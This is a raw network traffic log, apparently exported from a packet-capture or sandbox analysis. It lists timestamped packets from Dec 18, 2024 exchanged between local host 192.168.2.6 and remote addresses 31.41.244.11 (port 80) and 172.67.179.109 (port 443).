                                                                                                                                                                  Dec 18, 2024 11:09:18.796849012 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:18.798612118 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:18.798618078 CET44349895172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.798813105 CET44349895172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.830462933 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.830528975 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.830693007 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.830738068 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.832835913 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.832859039 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.832889080 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.832912922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.837663889 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.837747097 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.837779045 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.837821007 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.842473984 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.842540979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.842607975 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.842653036 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.844211102 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:18.847311974 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.847407103 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.847554922 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.847599030 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.849056959 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:18.849081993 CET49895443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:18.849136114 CET44349895172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.856291056 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.856338978 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.856363058 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.856385946 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.856911898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.856961966 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.856969118 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.857013941 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.861247063 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.861304045 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.861356974 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.861402988 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.865982056 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.866044998 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.866063118 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.866106987 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.870203972 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.870258093 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.870280981 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.870326996 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.874777079 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.874830961 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.874852896 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.874892950 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.879353046 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.879410028 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.879602909 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.879642010 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.883759975 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.883827925 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.883872986 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.883913994 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.888426065 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.888485909 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.888535023 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.888578892 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.892113924 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.892184019 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.892216921 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.892258883 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.895675898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.895797014 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.895859003 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.895905972 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.899398088 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.899447918 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.899456978 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.899497986 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.903037071 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.903089046 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.903100014 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.903136015 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.906606913 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.906622887 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.906686068 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.910317898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.910377979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.910393000 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.910428047 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.913925886 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.913971901 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.913975000 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.914009094 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.917633057 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.917685986 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.917721987 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.917759895 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.950521946 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.950556040 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.950589895 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.950608969 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:18.952263117 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.952318907 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:18.952438116 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.021387100 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.021408081 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.021526098 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.022706985 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.022754908 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.022797108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.022834063 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.025573015 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.025621891 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.025662899 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.025701046 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.028491974 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.028542042 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.028664112 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.028704882 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.031480074 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.031527042 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.031574965 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.031615973 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.034133911 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.034183979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.034219027 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.034256935 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.036894083 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.036916971 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.036945105 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.036966085 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.039567947 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.039623022 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.039675951 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.039716959 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.042166948 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.042220116 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.042256117 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.042294979 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.044720888 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.044775963 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.044953108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.044995070 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.047198057 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.047251940 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.047300100 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.047344923 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.049763918 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.049814939 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.049923897 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.049966097 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.052345991 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.052400112 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.052432060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.052470922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.054773092 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.054801941 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.054819107 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.054841995 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.057318926 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.057365894 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.057374954 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.057399988 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.059952021 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.060003042 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.060014009 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.060049057 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.062369108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.062417984 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.062443972 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.062648058 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.065051079 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.065093994 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.065162897 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.065206051 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.067550898 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.067601919 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.067625046 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.067663908 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.069996119 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.070049047 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.070077896 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.070116997 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.072475910 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.072489023 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.072520018 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.072540998 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.075145006 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.075190067 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.075252056 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.075293064 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.077486992 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.077534914 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.077564955 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.077605009 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.079339981 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.079384089 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.079471111 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.079511881 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.081178904 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.081223011 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.081310987 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.081351995 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.083082914 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.083095074 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.083132029 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.084930897 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.084984064 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.085019112 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.085059881 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.086833954 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.086880922 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.087044001 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.087086916 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.088716984 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.088772058 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.088792086 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.088831902 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.090483904 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.090532064 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.090660095 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.090701103 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.092631102 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.092685938 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.092685938 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.092721939 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.094733000 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.094784975 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.094827890 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.094867945 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.096532106 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.096561909 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.096585035 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.096606970 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.098113060 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.098159075 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.098161936 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.098198891 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.099781036 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.099833012 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.099847078 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.099888086 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.101583958 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.101633072 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.101679087 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.101718903 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.103563070 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.103596926 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.103610992 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.103663921 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.105299950 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.105345964 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.212465048 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.212532997 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.212572098 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.212610006 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.213192940 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.213233948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.213262081 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.213294983 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.214771986 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.214813948 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.214956045 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.214989901 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.216442108 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.216485977 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.216496944 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.216536999 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.218027115 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.218075991 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.218096018 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.218133926 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.219485044 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.219527006 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.219563961 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.219599962 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.221041918 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.221067905 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.221081018 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.221100092 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.222573042 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.222615957 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.222673893 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.222712994 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.224071026 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.224114895 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.224190950 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.224255085 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.225614071 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.225645065 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.225657940 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.225677967 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.226999044 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.227041960 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.227047920 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.227073908 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.228368998 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.228413105 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.228473902 CET804989431.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:19.228513956 CET4989480192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:19.229899883 CET804989431.41.244.11192.168.2.6
